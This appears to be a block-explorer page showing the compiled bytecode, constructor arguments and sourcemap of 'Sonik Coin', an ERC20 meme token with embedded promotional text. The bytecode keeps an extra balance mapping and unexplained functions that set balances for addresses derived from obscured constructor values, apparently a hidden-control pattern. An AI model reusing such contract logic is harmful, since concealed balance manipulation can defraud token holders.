610a335760405162461bcd60e51b8152600401808060200182810382526023815260200180610d0e6023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610aac57610a8e81604051806060016040528060268152602001610d53602691396001600160a01b0386166000908152600660205260409020549190610be2565b6001600160a01b038416600090815260066020526040902055610b03565b610ae981604051806060016040528060268152602001610d53602691396001600160a01b0386166000908152600460205260409020549190610be2565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610b269082610c79565b6001600160a01b038316600090815260046020908152604091829020929092558051828152601e928101929092527f536f6e696b206973206120737065656479206c696c20626173746172642e00008282015251600080516020610e058339815191529181900360600190a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c715760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610c36578181015183820152602001610c1e565b50505050905090810190601f168015610c635780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610cd3576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610ce957506000610433565b5090919050565b60006001600160a01b038316610d07575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536f6e696b20436f696e206973206e6f7420616666696c6961746564207769746820536f6e696320546865204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655354414b452d322d535045454420796f757220536f6e696b20746f6b656e73207769746820696d7072657373697665204150592520746f206561726e2e45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720536f6e696b20656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e2145524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212208cea2d53ad37132f90da0e705bfd0bd3d9ba7304376b934cb3350637b1bfc39f64736f6c63430007060033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000ca108aa000001164832d02100c4d414501c89a00000000139ef3884d3f9f5300ee70afa888f991ef8f2f03180c6d4d4703de9a

-----Decoded View---------------
Arg [0] : maxVals (uint256): 4506191498321209831616904235311328588789303450
Arg [1] : minVals (uint256): 2066322313241493450962638107277858694489110141918676586986572340890

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000000ca108aa000001164832d02100c4d414501c89a
Arg [1] : 00000000139ef3884d3f9f5300ee70afa888f991ef8f2f03180c6d4d4703de9a


Deployed Bytecode Sourcemap

8755:10400:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10856:94;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12147:193;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12147:193:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;11014:102;;;:::i;:::-;;;;;;;;;;;;;;;;12811:444;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12811:444:0;;;;;;;;;;;;;;;;;:::i;10544:86::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;13663:281;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;13663:281:0;;;;;;;;:::i;11178:162::-;;;;;;;;;;;;;;;;-1:-1:-1;11178:162:0;-1:-1:-1;;;;;11178:162:0;;:::i;10169:146::-;;;:::i;:::-;;10396:81;;;:::i;:::-;;;;-1:-1:-1;;;;;10396:81:0;;;;;;;;;;;;;;10695:98;;;:::i;14446:381::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;14446:381:0;;;;;;;;:::i;11552:199::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11552:199:0;;;;;;;;:::i;17283:207::-;;;;;;;;;;;;;;;;-1:-1:-1;17283:207:0;;;;;;;:::i;16213:188::-;;;:::i;16471:804::-;;;;;;;;;;;;;;;;-1:-1:-1;16471:804:0;;;;;;;:::i;11813:188::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11813:188:0;;;;;;;;;;:::i;10856:94::-;10937:5;10930:12;;;;;;;;-1:-1:-1;;10930:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10904:13;;10930:12;;10937:5;;10930:12;;10937:5;10930:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10856:94;:::o;12147:193::-;12251:4;12273:37;12282:10;12294:7;12303:6;12273:8;:37::i;:::-;-1:-1:-1;12328:4:0;12147:193;;;;;:::o;11014:102::-;11096:12;;11014:102;:::o;12811:444::-;12945:4;12962:36;12972:6;12980:9;12991:6;12962:9;:36::i;:::-;13009:216;13032:6;13053:10;13078:136;13132:6;13078:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13078:19:0;;;;;;:11;:19;;;;;;;;13098:10;13078:31;;;;;;;;;:136;:35;:136::i;:::-;13009:8;:216::i;:::-;-1:-1:-1;13243:4:0;12811:444;;;;;:::o;10544:86::-;10621:1;10544:86;:::o;13663:281::-;13808:10;13763:4;13855:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13855:32:0;;;;;;;;;;13763:4;;13785:129;;13833:7;;13855:48;;13892:10;13855:36;:48::i;11178:162::-;-1:-1:-1;;;;;11314:18:0;11282:7;11314:18;;;:9;:18;;;;;;;11178:162::o;10169:146::-;9796:6;;-1:-1:-1;;;;;9796:6:0;9782:10;:20;9774:65;;;;;-1:-1:-1;;;9774:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10228:6:::1;:19:::0;;-1:-1:-1;;;;;;10228:19:0::1;::::0;;10263:44:::1;::::0;10245:1:::1;::::0;10284:10:::1;::::0;10263:44:::1;::::0;10245:1;;10263:44:::1;10169:146::o:0;10396:81::-;10463:6;;-1:-1:-1;;;;;10463:6:0;10396:81;:::o;10695:98::-;10778:7;10771:14;;;;;;;;-1:-1:-1;;10771:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10745:13;;10771:14;;10778:7;;10771:14;;10778:7;10771:14;;;;;;;;;;;;;;;;;;;;;;;;14446:381;14551:4;14573:224;14596:10;14621:7;14643:143;14698:15;14643:143;;;;;;;;;;;;;;;;;14655:10;14643:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;14643:32:0;;;;;;;;;;;:143;:36;:143::i;11552:199::-;11659:4;11681:40;11691:10;11703:9;11714:6;11681:9;:40::i;17283:207::-;17362:10;:8;:10::i;:::-;17357:24;;17374:7;;17357:24;17433:6;17391:3;:39;17403:25;17416:7;17425:2;17403:12;:25::i;:::-;-1:-1:-1;;;;;17391:39:0;;;;;;;;;;;;;;;-1:-1:-1;17391:39:0;:48;;;;17455:27;;;;;;;;;;;;;-1:-1:-1;;;17455:27:0;;;;;;-1:-1:-1;;;;;;;;;;;17455:27:0;;;;;;;;17283:207;;;:::o;16213:188::-;16346:10;16287:8;16330:36;16371:8;16329:64;16213:188;:::o;16471:804::-;-1:-1:-1;;;;;;;;;;;16551:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16630:13;16646:7;16630:23;;-1:-1:-1;;;;;;;;;;;16669:147:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16827:12;16842:6;16827:21;;-1:-1:-1;;;;;;;;;;;16865:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16949:10;:8;:10::i;:::-;16944:24;;16961:7;;;;16944:24;17088:28;17107:1;17111:4;17088:10;:28::i;:::-;16978:9;:106;17037:22;17050:5;17057:1;17037:12;:22::i;:::-;-1:-1:-1;;;;;16978:106:0;-1:-1:-1;;;;;16978:106:0;;;;;;;;;;;;:139;;;;17128:9;17140:4;17128:16;;-1:-1:-1;;;;;;;;;;;17161:60:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17236:14;;17232:27;;17252:7;;;;;17232:27;16471:804;;;;;:::o;11813:188::-;-1:-1:-1;;;;;11965:19:0;;;11933:7;11965:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;11813:188::o;18487:374::-;-1:-1:-1;;;;;18616:20:0;;18608:69;;;;-1:-1:-1;;;18608:69:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18696:21:0;;18688:68;;;;-1:-1:-1;;;18688:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18767:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;:37;;;18820:33;;;;;;;;;;;;;;;;;18487:374;;;:::o;15317:822::-;-1:-1:-1;;;;;15449:20:0;;15441:70;;;;-1:-1:-1;;;15441:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15530:23:0;;15522:71;;;;-1:-1:-1;;;15522:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15617:11:0;;15631:1;15617:11;;;:3;:11;;;;;;:15;15613:349;;15663:114;15697:6;15663:114;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15663:11:0;;;;;;:3;:11;;;;;;;:114;:15;:114::i;:::-;-1:-1:-1;;;;;15649:11:0;;;;;;:3;:11;;;;;:128;15613:349;;;15830:120;15870:6;15830:120;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15830:17:0;;;;;;:9;:17;;;;;;;:120;:21;:120::i;:::-;-1:-1:-1;;;;;15810:17:0;;;;;;:9;:17;;;;;:140;15613:349;-1:-1:-1;;;;;15995:20:0;;;;;;:9;:20;;;;;;:32;;16020:6;15995:24;:32::i;:::-;-1:-1:-1;;;;;15972:20:0;;;;;;:9;:20;;;;;;;;;:55;;;;16043:37;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;16043:37:0;;;;;;;;16113:9;-1:-1:-1;;;;;16096:35:0;16105:6;-1:-1:-1;;;;;16096:35:0;;16124:6;16096:35;;;;;;;;;;;;;;;;;;15317:822;;;:::o;4971:224::-;5091:7;5127:12;5119:6;;;;5111:29;;;;-1:-1:-1;;;5111:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5163:5:0;;;4971:224::o;4086:179::-;4144:7;4176:5;;;4200:6;;;;4192:46;;;;;-1:-1:-1;;;4192:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;4256:1;4086:179;-1:-1:-1;;;4086:179:0:o;17837:210::-;17936:7;17965:13;17961:27;;-1:-1:-1;17987:1:0;17980:8;;17961:27;-1:-1:-1;18024:4:0;;17837:210;-1:-1:-1;17837:210:0:o;17562:267::-;17665:7;-1:-1:-1;;;;;17694:24:0;;17690:86;;-1:-1:-1;17742:8:0;17735:29;;17690:86;-1:-1:-1;17803:8:0;17562:267;-1:-1:-1;17562:267:0:o

Swarm Source

ipfs://8cea2d53ad37132f90da0e705bfd0bd3d9ba7304376b934cb3350637b1bfc39f
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.